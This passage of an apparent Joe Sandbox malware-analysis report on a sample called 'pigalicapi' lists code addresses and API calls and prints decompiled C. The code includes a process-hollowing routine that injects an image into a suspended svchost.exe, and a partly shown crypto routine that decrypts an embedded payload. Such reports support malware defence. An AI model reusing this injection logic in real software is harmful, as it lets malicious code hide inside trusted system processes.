                                                                                                                                                                                                                                                                          0x04004bbc
                                                                                                                                                                                                                                                                          0x040056f0
                                                                                                                                                                                                                                                                          0x040056f0
                                                                                                                                                                                                                                                                          0x040056fc
                                                                                                                                                                                                                                                                          0x04004bc2
                                                                                                                                                                                                                                                                          0x04004bcc
                                                                                                                                                                                                                                                                          0x04004bd1
                                                                                                                                                                                                                                                                          0x04004bdb
                                                                                                                                                                                                                                                                          0x04004be1
                                                                                                                                                                                                                                                                          0x04004beb
                                                                                                                                                                                                                                                                          0x04004bf9
                                                                                                                                                                                                                                                                          0x04004c31
                                                                                                                                                                                                                                                                          0x04004c34
                                                                                                                                                                                                                                                                          0x04004c49
                                                                                                                                                                                                                                                                          0x04004c4f
                                                                                                                                                                                                                                                                          0x04004c60
                                                                                                                                                                                                                                                                          0x04004c66
                                                                                                                                                                                                                                                                          0x04004c77
                                                                                                                                                                                                                                                                          0x04004c7d
                                                                                                                                                                                                                                                                          0x04004c84
                                                                                                                                                                                                                                                                          0x040056eb
                                                                                                                                                                                                                                                                          0x04004bf6
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04004c9e
                                                                                                                                                                                                                                                                          0x04004ca1
                                                                                                                                                                                                                                                                          0x04004ca4
                                                                                                                                                                                                                                                                          0x04004cb6
                                                                                                                                                                                                                                                                          0x04004cb3
                                                                                                                                                                                                                                                                          0x04004cb3
                                                                                                                                                                                                                                                                          0x040052a8
                                                                                                                                                                                                                                                                          0x040052b2
                                                                                                                                                                                                                                                                          0x040052eb
                                                                                                                                                                                                                                                                          0x040052f3
                                                                                                                                                                                                                                                                          0x0400530e
                                                                                                                                                                                                                                                                          0x04005313
                                                                                                                                                                                                                                                                          0x04005322
                                                                                                                                                                                                                                                                          0x04005322
                                                                                                                                                                                                                                                                          0x0400532b
                                                                                                                                                                                                                                                                          0x0400533f
                                                                                                                                                                                                                                                                          0x04005344
                                                                                                                                                                                                                                                                          0x04005347
                                                                                                                                                                                                                                                                          0x0400534e
                                                                                                                                                                                                                                                                          0x040056b8
                                                                                                                                                                                                                                                                          0x040056c3
                                                                                                                                                                                                                                                                          0x040056d4
                                                                                                                                                                                                                                                                          0x040056e5
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04005354
                                                                                                                                                                                                                                                                          0x04005354
                                                                                                                                                                                                                                                                          0x04005362
                                                                                                                                                                                                                                                                          0x0400537f
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04005397
                                                                                                                                                                                                                                                                          0x0400539d
                                                                                                                                                                                                                                                                          0x040053a0
                                                                                                                                                                                                                                                                          0x040053ca
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040053d0
                                                                                                                                                                                                                                                                          0x040053da
                                                                                                                                                                                                                                                                          0x040053fd
                                                                                                                                                                                                                                                                          0x04005403
                                                                                                                                                                                                                                                                          0x04005439
                                                                                                                                                                                                                                                                          0x0400543e
                                                                                                                                                                                                                                                                          0x04005441
                                                                                                                                                                                                                                                                          0x0400544e
                                                                                                                                                                                                                                                                          0x0400569b
                                                                                                                                                                                                                                                                          0x040056a2
                                                                                                                                                                                                                                                                          0x040056b2
                                                                                                                                                                                                                                                                          0x040056b2
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040056a2
                                                                                                                                                                                                                                                                          0x0400545e
                                                                                                                                                                                                                                                                          0x04005477
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400548b
                                                                                                                                                                                                                                                                          0x04005491
                                                                                                                                                                                                                                                                          0x0400549b
                                                                                                                                                                                                                                                                          0x040054a5
                                                                                                                                                                                                                                                                          0x040054c0
                                                                                                                                                                                                                                                                          0x040054f5
                                                                                                                                                                                                                                                                          0x040054fa
                                                                                                                                                                                                                                                                          0x040054fd
                                                                                                                                                                                                                                                                          0x0400550d
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400551d
                                                                                                                                                                                                                                                                          0x040054ba
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040054ba
                                                                                                                                                                                                                                                                          0x0400550d
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400551f
                                                                                                                                                                                                                                                                          0x0400551f
                                                                                                                                                                                                                                                                          0x04005526
                                                                                                                                                                                                                                                                          0x04005533
                                                                                                                                                                                                                                                                          0x04005540
                                                                                                                                                                                                                                                                          0x04005598
                                                                                                                                                                                                                                                                          0x040055ae
                                                                                                                                                                                                                                                                          0x040055b4
                                                                                                                                                                                                                                                                          0x040055c1
                                                                                                                                                                                                                                                                          0x040055d8
                                                                                                                                                                                                                                                                          0x04005631
                                                                                                                                                                                                                                                                          0x04005654
                                                                                                                                                                                                                                                                          0x04005659
                                                                                                                                                                                                                                                                          0x040055da
                                                                                                                                                                                                                                                                          0x040055ef
                                                                                                                                                                                                                                                                          0x04005612
                                                                                                                                                                                                                                                                          0x04005617
                                                                                                                                                                                                                                                                          0x04005617
                                                                                                                                                                                                                                                                          0x0400566b
                                                                                                                                                                                                                                                                          0x0400567c
                                                                                                                                                                                                                                                                          0x0400568b
                                                                                                                                                                                                                                                                          0x0400568b
                                                                                                                                                                                                                                                                          0x04005542
                                                                                                                                                                                                                                                                          0x04005552
                                                                                                                                                                                                                                                                          0x0400555b
                                                                                                                                                                                                                                                                          0x04005573
                                                                                                                                                                                                                                                                          0x04005578
                                                                                                                                                                                                                                                                          0x04005584
                                                                                                                                                                                                                                                                          0x04005584
                                                                                                                                                                                                                                                                          0x04005695
                                                                                                                                                                                                                                                                          0x04005695
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04005526
                                                                                                                                                                                                                                                                          0x0400545e
                                                                                                                                                                                                                                                                          0x0400534e
                                                                                                                                                                                                                                                                          0x04004c84
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04004bf9

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 04004BAC
                                                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 04004BDB
                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(0000EA60,0000000A), ref: 04004C19
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 04004C49
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 04004C60
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 04004C77
                                                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 040056F0
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocVirtual$EventInitializeObjectSingleUninitializeWait
                                                                                                                                                                                                                                                                          • String ID: $`$pigalicapi
                                                                                                                                                                                                                                                                          • API String ID: 1834614700-42206024
                                                                                                                                                                                                                                                                          • Opcode ID: 0b588b8632747e3a4410319c3fb32f93fea484f2e03b927fbc22a93c38a5764c
                                                                                                                                                                                                                                                                          • Instruction ID: f4bd0befb8abd7887e3d73177c72bf7f141d25b4899fa760b57ca1a426edb567
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b588b8632747e3a4410319c3fb32f93fea484f2e03b927fbc22a93c38a5764c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39628DB1D00218ABFB14DBA0DC84FEDB7B9AF49309F04C559E6057B281E775AA84CF61
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E040020B0(intOrPtr _a4, signed char _a8, CHAR* _a12) {
                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                          				char _v276;
                                                                                                                                                                                                                                                                          				struct _CONTEXT _v996;
                                                                                                                                                                                                                                                                          				struct _PROCESS_INFORMATION _v1012;
                                                                                                                                                                                                                                                                          				intOrPtr _v1016;
                                                                                                                                                                                                                                                                          				struct _STARTUPINFOA _v1092;
                                                                                                                                                                                                                                                                          				intOrPtr _v1096;
                                                                                                                                                                                                                                                                          				void _v1100;
                                                                                                                                                                                                                                                                          				signed int _v1104;
                                                                                                                                                                                                                                                                          				CHAR* _t121;
                                                                                                                                                                                                                                                                          				void* _t128;
                                                                                                                                                                                                                                                                          				int _t130;
                                                                                                                                                                                                                                                                          				void* _t132;
                                                                                                                                                                                                                                                                          				int _t140;
                                                                                                                                                                                                                                                                          				int _t143;
                                                                                                                                                                                                                                                                          				int _t145;
                                                                                                                                                                                                                                                                          				int _t148;
                                                                                                                                                                                                                                                                          				void* _t263;
                                                                                                                                                                                                                                                                          				void* _t265;
                                                                                                                                                                                                                                                                          				void* _t266;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				if(_a4 == 0) {
                                                                                                                                                                                                                                                                          					L26:
                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				GetEnvironmentVariableA("SystemRoot",  &_v276, 0x104);
                                                                                                                                                                                                                                                                          				_t121 = lstrcatA( &_v276, "\\system32\\svchost.exe");
                                                                                                                                                                                                                                                                          				if(_a12 != 0) {
                                                                                                                                                                                                                                                                          					lstrcatA( &_v276, " ");
                                                                                                                                                                                                                                                                          					_t121 = lstrcatA( &_v276, _a12);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				E04007D20(_t121,  &_v1012, 0, 0x10);
                                                                                                                                                                                                                                                                          				E04007D20( &_v1092,  &_v1092, 0, 0x44);
                                                                                                                                                                                                                                                                          				_t265 = _t263 + 0x18;
                                                                                                                                                                                                                                                                          				_v1092.cb = 0x44;
                                                                                                                                                                                                                                                                          				_v1096 = _a4 +  *((intOrPtr*)(_a4 + 0x3c));
                                                                                                                                                                                                                                                                          				_v1016 = _v1096 + ( *(_v1096 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                                                                                                                                          				_v8 =  *((intOrPtr*)(_v1096 + 0x50));
                                                                                                                                                                                                                                                                          				_t128 = VirtualAlloc(0, _v8, 0x3000, 0x40); // executed
                                                                                                                                                                                                                                                                          				_v12 = _t128;
                                                                                                                                                                                                                                                                          				if(_v12 != 0) {
                                                                                                                                                                                                                                                                          					_t130 = CreateProcessA(0,  &_v276, 0, 0, 0, 4, 0, 0,  &_v1092,  &_v1012); // executed
                                                                                                                                                                                                                                                                          					if(_t130 != 0) {
                                                                                                                                                                                                                                                                          						_t132 = VirtualAllocEx(_v1012.hProcess,  *(_v1096 + 0x34), _v8, 0x3000, 0x40); // executed
                                                                                                                                                                                                                                                                          						_v1100 = _t132;
                                                                                                                                                                                                                                                                          						if(_v1100 != 0) {
                                                                                                                                                                                                                                                                          							L10:
                                                                                                                                                                                                                                                                          							E04007B70(_v12, _a4,  *((intOrPtr*)(_v1096 + 0x54)));
                                                                                                                                                                                                                                                                          							_t266 = _t265 + 0xc;
                                                                                                                                                                                                                                                                          							_v1104 = 0;
                                                                                                                                                                                                                                                                          							while(_v1104 < ( *(_v1096 + 6) & 0x0000ffff)) {
                                                                                                                                                                                                                                                                          								if((_a8 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          									E04007B70(_v12 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)), _a4 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)),  *((intOrPtr*)(_v1016 + 0x10 + _v1104 * 0x28)));
                                                                                                                                                                                                                                                                          									_t266 = _t266 + 0xc;
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									E04007B70(_v12 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)), _a4 +  *((intOrPtr*)(_v1016 + 0x14 + _v1104 * 0x28)),  *((intOrPtr*)(_v1016 + 0x10 + _v1104 * 0x28)));
                                                                                                                                                                                                                                                                          									_t266 = _t266 + 0xc;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_v1104 = _v1104 + 1;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							E040026D0(_v12, _v1100);
                                                                                                                                                                                                                                                                          							_t140 = WriteProcessMemory(_v1012.hProcess, _v1100, _v12, _v8, 0); // executed
                                                                                                                                                                                                                                                                          							if(_t140 != 0) {
                                                                                                                                                                                                                                                                          								VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          								_v996.ContextFlags = 0x10007;
                                                                                                                                                                                                                                                                          								_t143 = GetThreadContext(_v1012.hThread,  &_v996); // executed
                                                                                                                                                                                                                                                                          								if(_t143 != 0) {
                                                                                                                                                                                                                                                                          									_t145 = WriteProcessMemory(_v1012.hProcess, _v996.Ebx + 8,  &_v1100, 4, 0); // executed
                                                                                                                                                                                                                                                                          									if(_t145 != 0) {
                                                                                                                                                                                                                                                                          										_v996.Eax = _v1100 +  *((intOrPtr*)(_v1096 + 0x28));
                                                                                                                                                                                                                                                                          										_t148 = SetThreadContext(_v1012.hThread,  &_v996); // executed
                                                                                                                                                                                                                                                                          										if(_t148 == 0) {
                                                                                                                                                                                                                                                                          											TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                          											CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                          											CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                          											goto L26;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          										ResumeThread(_v1012.hThread); // executed
                                                                                                                                                                                                                                                                          										return _v1012.hProcess;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                          									CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                          									CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                          									return 0;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                          								CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                          								CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                          								return 0;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                          							CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                          							CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                          							VirtualFree(_v12, 0, 0x8000);
                                                                                                                                                                                                                                                                          							return 0;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v1100 = VirtualAllocEx(_v1012.hProcess, 0, _v8, 0x103000, 0x40);
                                                                                                                                                                                                                                                                          						if(_v1100 != 0) {
                                                                                                                                                                                                                                                                          							goto L10;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                          						CloseHandle(_v1012);
                                                                                                                                                                                                                                                                          						CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                          						VirtualFree(_v12, 0, 0x8000);
                                                                                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					VirtualFree(_v12, 0, 0x8000);
                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}
























                                                                                                                                                                                                                                                                          0x040020bd
                                                                                                                                                                                                                                                                          0x04002502
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002502
                                                                                                                                                                                                                                                                          0x040020d4
                                                                                                                                                                                                                                                                          0x040020e6
                                                                                                                                                                                                                                                                          0x040020f0
                                                                                                                                                                                                                                                                          0x040020fe
                                                                                                                                                                                                                                                                          0x0400210f
                                                                                                                                                                                                                                                                          0x0400210f
                                                                                                                                                                                                                                                                          0x04002120
                                                                                                                                                                                                                                                                          0x04002133
                                                                                                                                                                                                                                                                          0x04002138
                                                                                                                                                                                                                                                                          0x0400213b
                                                                                                                                                                                                                                                                          0x0400214e
                                                                                                                                                                                                                                                                          0x04002168
                                                                                                                                                                                                                                                                          0x04002177
                                                                                                                                                                                                                                                                          0x04002187
                                                                                                                                                                                                                                                                          0x0400218d
                                                                                                                                                                                                                                                                          0x04002194
                                                                                                                                                                                                                                                                          0x040021c0
                                                                                                                                                                                                                                                                          0x040021c8
                                                                                                                                                                                                                                                                          0x040021fe
                                                                                                                                                                                                                                                                          0x04002204
                                                                                                                                                                                                                                                                          0x04002211
                                                                                                                                                                                                                                                                          0x0400227d
                                                                                                                                                                                                                                                                          0x0400228f
                                                                                                                                                                                                                                                                          0x04002294
                                                                                                                                                                                                                                                                          0x04002297
                                                                                                                                                                                                                                                                          0x040022b2
                                                                                                                                                                                                                                                                          0x040022ce
                                                                                                                                                                                                                                                                          0x0400235e
                                                                                                                                                                                                                                                                          0x04002363
                                                                                                                                                                                                                                                                          0x040022d0
                                                                                                                                                                                                                                                                          0x04002312
                                                                                                                                                                                                                                                                          0x04002317
                                                                                                                                                                                                                                                                          0x04002317
                                                                                                                                                                                                                                                                          0x040022ac
                                                                                                                                                                                                                                                                          0x040022ac
                                                                                                                                                                                                                                                                          0x04002376
                                                                                                                                                                                                                                                                          0x04002396
                                                                                                                                                                                                                                                                          0x0400239e
                                                                                                                                                                                                                                                                          0x040023ec
                                                                                                                                                                                                                                                                          0x040023f2
                                                                                                                                                                                                                                                                          0x0400240a
                                                                                                                                                                                                                                                                          0x04002412
                                                                                                                                                                                                                                                                          0x04002460
                                                                                                                                                                                                                                                                          0x04002468
                                                                                                                                                                                                                                                                          0x040024a6
                                                                                                                                                                                                                                                                          0x040024ba
                                                                                                                                                                                                                                                                          0x040024c2
                                                                                                                                                                                                                                                                          0x040024e2
                                                                                                                                                                                                                                                                          0x040024ef
                                                                                                                                                                                                                                                                          0x040024fc
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040024fc
                                                                                                                                                                                                                                                                          0x040024cb
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040024d1
                                                                                                                                                                                                                                                                          0x04002473
                                                                                                                                                                                                                                                                          0x04002480
                                                                                                                                                                                                                                                                          0x0400248d
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002493
                                                                                                                                                                                                                                                                          0x0400241d
                                                                                                                                                                                                                                                                          0x0400242a
                                                                                                                                                                                                                                                                          0x04002437
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400243d
                                                                                                                                                                                                                                                                          0x040023a9
                                                                                                                                                                                                                                                                          0x040023b6
                                                                                                                                                                                                                                                                          0x040023c3
                                                                                                                                                                                                                                                                          0x040023d4
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040023da
                                                                                                                                                                                                                                                                          0x0400222d
                                                                                                                                                                                                                                                                          0x0400223a
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002245
                                                                                                                                                                                                                                                                          0x04002252
                                                                                                                                                                                                                                                                          0x0400225f
                                                                                                                                                                                                                                                                          0x04002270
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002276
                                                                                                                                                                                                                                                                          0x040021d5
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002196
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002196

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(SystemRoot,?,00000104), ref: 040020D4
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,\system32\svchost.exe), ref: 040020E6
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0400C38C), ref: 040020FE
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00000000), ref: 0400210F
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 04002187
                                                                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 040021C0
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040021D5
                                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 040021FE
                                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(?,00000000,?,00103000,00000040), ref: 04002227
                                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 04002245
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 04002252
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0400225F
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04002270
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Virtual$Alloclstrcat$CloseFreeHandleProcess$CreateEnvironmentTerminateVariable
                                                                                                                                                                                                                                                                          • String ID: D$SystemRoot$\system32\svchost.exe
                                                                                                                                                                                                                                                                          • API String ID: 1819736980-1559310322
                                                                                                                                                                                                                                                                          • Opcode ID: 618df5bf54c1a5a0a6d1612c0a6f02d09146bff70f4639aa179a0dfbd2a6d315
                                                                                                                                                                                                                                                                          • Instruction ID: 24de31acf85f81f6cd7956eb3c6d21bf067972eab508d3ad9c1f9881985dd567
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 618df5bf54c1a5a0a6d1612c0a6f02d09146bff70f4639aa179a0dfbd2a6d315
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 27D13F71A44215ABEB28DF54CC94FAE77B9FB48304F0486D8F609B7281D678AE80CF55
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 536 40047f0-4004801 537 4004807-400480e 536->537 538 4004aab-4004ab1 536->538 537->538 539 4004814-4004832 CryptAcquireContextA 537->539 540 4004834-400483f GetLastError 539->540 541 4004856-400485a 539->541 540->541 542 4004841-4004850 CryptAcquireContextA 540->542 541->538 543 4004860-400489d 541->543 542->541 545 40048a3-40048f3 call 4007b70 CryptCreateHash 543->545 546 4004a9f-4004aa5 CryptReleaseContext 543->546 549 4004a90-4004a96 545->549 550 40048f9-4004913 CryptHashData 545->550 546->538 551 4004a98 549->551 552 4004a9a 549->552 553 4004a83-4004a8a CryptDestroyHash 550->553 554 4004919-4004944 CryptDeriveKey 550->554 551->546 552->546 553->549 554->553 555 400494a-400498f CryptDecrypt CryptDestroyKey 554->555 555->553 556 4004995-40049b1 CryptCreateHash 555->556 556->553 557 40049b7-40049d4 CryptHashData 556->557 558 4004a76-4004a7d CryptDestroyHash 557->558 559 40049da-4004a0f CryptGetHashParam 557->559 558->553 559->558 560 4004a11-4004a3c CryptGetHashParam 559->560 560->558 561 4004a3e-4004a58 call 4007c70 560->561 561->558 564 4004a5a-4004a72 call 4007b70 561->564 564->558
                                                                                                                                                                                                                                                                          C-Code - Quality: 37%
                                                                                                                                                                                                                                                                          			E040047F0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                          				signed int _v5;
                                                                                                                                                                                                                                                                          				long* _v12;
                                                                                                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                                                                                                          				char _v764;
                                                                                                                                                                                                                                                                          				char _v780;
                                                                                                                                                                                                                                                                          				intOrPtr _v784;
                                                                                                                                                                                                                                                                          				char _v788;
                                                                                                                                                                                                                                                                          				int _v792;
                                                                                                                                                                                                                                                                          				int _v796;
                                                                                                                                                                                                                                                                          				intOrPtr _v800;
                                                                                                                                                                                                                                                                          				long* _v804;
                                                                                                                                                                                                                                                                          				int _v808;
                                                                                                                                                                                                                                                                          				int _v812;
                                                                                                                                                                                                                                                                          				char _v816;
                                                                                                                                                                                                                                                                          				int _v820;
                                                                                                                                                                                                                                                                          				char _v824;
                                                                                                                                                                                                                                                                          				char _v828;
                                                                                                                                                                                                                                                                          				char _v844;
                                                                                                                                                                                                                                                                          				int _t61;
                                                                                                                                                                                                                                                                          				char* _t67;
                                                                                                                                                                                                                                                                          				intOrPtr _t68;
                                                                                                                                                                                                                                                                          				int _t69;
                                                                                                                                                                                                                                                                          				char* _t73;
                                                                                                                                                                                                                                                                          				intOrPtr _t74;
                                                                                                                                                                                                                                                                          				intOrPtr _t76;
                                                                                                                                                                                                                                                                          				intOrPtr _t77;
                                                                                                                                                                                                                                                                          				signed char _t78;
                                                                                                                                                                                                                                                                          				void* _t109;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v5 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 <= 0x300) {
                                                                                                                                                                                                                                                                          					L25:
                                                                                                                                                                                                                                                                          					return _v5;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                          					_t61 = CryptAcquireContextA( &_v12, 0, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                          					if(_t61 == 0 && GetLastError() == 0x80090016) {
                                                                                                                                                                                                                                                                          						CryptAcquireContextA( &_v12, 0, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                          						_v788 = 0x10;
                                                                                                                                                                                                                                                                          						_v784 = 0x10;
                                                                                                                                                                                                                                                                          						_v792 = 0;
                                                                                                                                                                                                                                                                          						while(_v792 < _a8 - 0x2ff) {
                                                                                                                                                                                                                                                                          							E04007B70( &_v780, _a4 + _v792, 0x300);
                                                                                                                                                                                                                                                                          							_t109 = _t109 + 0xc;
                                                                                                                                                                                                                                                                          							_t67 =  &_v780;
                                                                                                                                                                                                                                                                          							_v800 = _t67;
                                                                                                                                                                                                                                                                          							_v796 = 0;
                                                                                                                                                                                                                                                                          							__imp__CryptCreateHash(_v12, 0x8003, 0, 0,  &_v796);
                                                                                                                                                                                                                                                                          							if(_t67 == 0) {
                                                                                                                                                                                                                                                                          								L21:
                                                                                                                                                                                                                                                                          								if((_v5 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          									_v792 = _v792 + 1;
                                                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								break;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_t68 = _v800;
                                                                                                                                                                                                                                                                          							__imp__CryptHashData(_v796, _t68, 0x10, 0);
                                                                                                                                                                                                                                                                          							if(_t68 != 0) {
                                                                                                                                                                                                                                                                          								_v804 = 0;
                                                                                                                                                                                                                                                                          								_t69 = _v796;
                                                                                                                                                                                                                                                                          								__imp__CryptDeriveKey(_v12, 0x6801, _t69, 1,  &_v804); // executed
                                                                                                                                                                                                                                                                          								if(_t69 != 0) {
                                                                                                                                                                                                                                                                          									_v812 = 0x2f0;
